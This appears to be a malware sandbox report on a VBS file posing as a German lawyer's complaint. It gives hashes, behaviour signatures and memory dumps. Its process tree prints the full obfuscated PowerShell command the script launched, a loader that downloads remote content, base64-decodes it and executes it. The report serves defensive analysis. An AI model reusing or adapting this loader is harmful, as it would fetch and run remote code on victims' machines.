Overview

overview

10

Static

static

1

Beschwerde...lt.vbs

windows7-x64

8

Beschwerde...lt.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-10-2024 14:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Beschwerde-Rechtsanwalt.vbs

  • Size

    11KB

  • MD5

    ccc92c18edd54b9cc3b2b4eda17fa805

  • SHA1

    f9e44c7c49f8a20824e986126c3e1f8f3e35b3a8

  • SHA256

    a0ab0a82d3d002785a5d1aafed149c455ae6a850c526cd78af24e42a3f453822

  • SHA512

    9a26fcdc46e8259707beb94b529bb7f88d074507a5776fe513b39dce205ca5bde305824063eebee18558d58af4111f471ed808b239d5a60da54041bd9fd21fcf

  • SSDEEP

    192:G3ICKmusCg05C6FLf7ifqMtgQoVcoNorNAJUgZ4nx:7EQ7ifqMzo0OWx

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Beschwerde-Rechtsanwalt.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sygehuse Rappenskralder Sandwichs Gliridae tonsillitis Bolsjevikkens Spejlmonogrammers #>;$Gasradiatorernes='Lighedens';<#Legitimationers Ink Pedalian Bonzery nonnative Forjoges Allods #>;$Athwarthawse=$host.PrivateData;If ($Athwarthawse) {$Likableness++;}function henaandende($Doohinkus){$Tabira=$Lommeregnere+$Doohinkus.Length-$Likableness;for( $relativpronominernes=2;$relativpronominernes -lt $Tabira;$relativpronominernes+=3){$Toolsheds='Absenteres';$Bide+=$Doohinkus[$relativpronominernes];}$Bide;}function Webbank($Disintegrator91){ & ($Kilovar) ($Disintegrator91);}$Wrinklet=henaandende 'diM otrzIni lFalPaaGi/Ju5D .P,0 F Ku( aW Ni,enW d roSuwTrsRn P,N,pT e i1 g0Ko.Tr0Pe;Si ,pWUniH nVa6L,4Ru;Tr S.xGa6Br4,t;Re MorAnv.a:Zo1Or2Pr1Va.Py0 B).t BiGSueU c .kR o,a/Fo2 k0 l1 S0Pa0Ve1Es0 a1 m SuFOniS,rlgeRnfReoPhxDo/R 1Sy2Lu1Fa.D,0ma ';$Underhandle=henaandende ' ,uUnSM EStRN -.laFlGVee LN oT , ';$undercrossing=henaandende 'OshAft StKlp,esF :S /re/Liw DwSuwFy. MaC,uThtfooH h daSpu RsOz-O c Fn F. RdJeeLe/B oanlSed o/ RmR oU,bsaiGelTieBl/PrB eaKanS a.auI s TiUnc I.TiqBaxCodBg ';$Blindtablets122=henaandende 'Ur>U ';$Kilovar=henaandende 'GlI BeJeXP ';$Amtsborgmester='asyl';$Kimm='\prefectorial.Twa';Webbank (henaandende 'Co$Ceg el.uoAkbMua l :HeTAniMad TsXsiI nF dEdsWatFri elP.lTee urNe=A $une anKiv P:ScaJup LpcadPraEntUraAn+H $RaKOciRam mmU. ');Webbank (henaandende ' a$U g rl Wo,abZoaLylS :BeTCoeP,kTesRatBikHerPri FtVdi,nk i=Ob$Meu nDedLaeSlrGlc ,r ,op,sAusUni TnExgIm. WsStp Pl TiCotl (Vo$MaBTilDiiHyn,rdLat.ma .b fl leFit.asDi1Ba2Be2 I).n ');Webbank (henaandende '.a[MiNLoeF.t G.KaSineTerLavKei ,cS eOvPS,o .iNon tn M iaAnn uaDogSte Arty]va: G:P SO eTocPruanrHui Jt .yFoP Dr o PtKio IcUnoFolTo .= P Dy[ sNEreCotUn.KoS Ee ycsputrr TiKntDoyF PTerL oRotAuoSkcH oImlKoTDey epPreSa] S: .:SaTMalR s v1 a2 . ');$undercrossing=$Tekstkritik[0];$relativpronominernesnterlaces=(henaandende ' ,$MiGPaL uo,fBI A .l A:krTFrRNekIsKUnr eOnogSkEMyn Ce a=VinPueSiwAf- OO RB ojR eUlC,atLo toS .YemS RT E M ,. GnSte At .. qw oEPab ncixL BIFeEInnBhT r ');Webbank ($relativpronominernesnterlaces);Webbank (henaandende 'R,$UnTBrr vkOrkK.rNeoCogVie ,n AeSk. lHCae Da rdH eSar sFl[Tr$noUDrnM d eW r hhTraDon adSolHieH ] e=la$KaWF,r yi dn,hkFalV.eSatT. ');$Affaldspriserne=henaandende ' $SaTShr .kudkSpr oVeg,eeSen oe n.M DBro Sws,nPal toCoa.nd.rFHeiCal ae S(Da$JuuU nTad,oe lr CcGer Do s ssOpiKonDegpi,Af$.fP,ueFonW n .aIdt.ii Us Ue Bc ,t eLsdMi)G ';$Pennatisected=$Tidsindstiller;Webbank (henaandende ' ,$V,gChLO.O SbM,a l m:DitDoRAtaSlA dB,rVoEKoN.eSDiEViR Es o=An( GT AeMeSK.TOr- p AVaTThH o De$FoPHae jnO NSpa,iTS iDaSPeEM.c PtTieTaDSe)Re ');while (!$Traadrensers) {Webbank (henaandende 'Ka$ungMilSoo bP,a.klUn:PeSMejSplOvls.n MdFae nrR,eBesC.=,a$ ht KrEjuU.eOp ') ;Webbank $Affaldspriserne;Webbank (henaandende ' ,S .t.ka Or OtL.-GeSKal.eeApeCopRe Ko4 A ');Webbank (henaandende ' $FlgU lDroTrbI ac l :WiTTrr TaS aMudgirAveStnSpsSleByrMisWi= e( KT,ee os.pt n-BaP haC tVuhUs Fr$ P ge rnScn,oa Ct aiBesIveBec Pt SeStdPa)Bi ') ;Webbank (henaandende 'B $ ugPrlFioS b PaGrlAn:LeDSkeTen.us uiE tKro Fm ee FtSlrG.iMisGakK e =Un$Peg,al noInb OaPalr :FiD UeAkpS.t Ch,eiPrnRegUd+Su+ n%Ma$ iTveePikO sBat GkSyrF i.rt diAnk l. ScJuo AudinDut.e ') ;$undercrossing=$Tekstkritik[$Densitometriske];}$Forsire=308882;$Barrikaderes=29015;Webbank (henaandende ' $Brg ,lMioAkbElaDelRe: BSIntFinRhgSpeU.tN s.i E.=Bf XaGInetrtPh-KaC aoShnIntT e anBat,g Sp$ RPKeeAknManStaSkt.eistsUde ,cSltTre Nd.n ');Webbank (henaandende 'Ch$N g FlKaoSkbFla,alUf:StB.ir .u vtL.tDooGrtC,rSikD.kngoPhrSnt feL.nSae e r=Co Fo[KaSC.y msSotKjeJem.o. aCSuoR.nBrvSmeBerJut E]He: E:SaFInrS o om oBF.aFosW eW.6F 4InS tUnrJei lnAkgVo( M$ScSGetHonW gFaeL.t ,sEr)Ji ');Webbank (henaandende ' .$T gSplOvoB b OaBalk : oS RmluiFitMih AiKanKngBe .i=Un To[SpSHuyA sTot teU,m T.S TKoe axSytHy.daE lnTucC.oNud,ai Fn sgMa]Co:Fo:StA rSTrC DITaIni.TeGCoeOrtAnS etirrM i InS g W(Pr$.pBOpr vuMutSitInoydt rOukKykg,oc,r Ctpae.enFieKu)Af ');Webbank (henaandende 'Pe$ChgGrlTioTabU aB lP :FaFCalKnlDeeVesAft TiMulFol iTodAlsExmbanCodF =Jr$P,SCemHeiAntBeh IiSan ,gTw.Sts muB.bKesR,tSur,iiVin ,g S(R $,pF oH.r is i rOieF,, .$ UB EaIor SrBli kB aUndRae FrM e Rs )F, ');Webbank $Fllestillidsmnd;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2480

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabA3A1.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • memory/2480-20-0x000007FEF598E000-0x000007FEF598F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2480-21-0x000000001B520000-0x000000001B802000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2480-23-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2480-22-0x00000000021D0000-0x00000000021D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2480-25-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2480-24-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2480-26-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2480-27-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2480-28-0x000007FEF598E000-0x000007FEF598F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2480-29-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2480-30-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download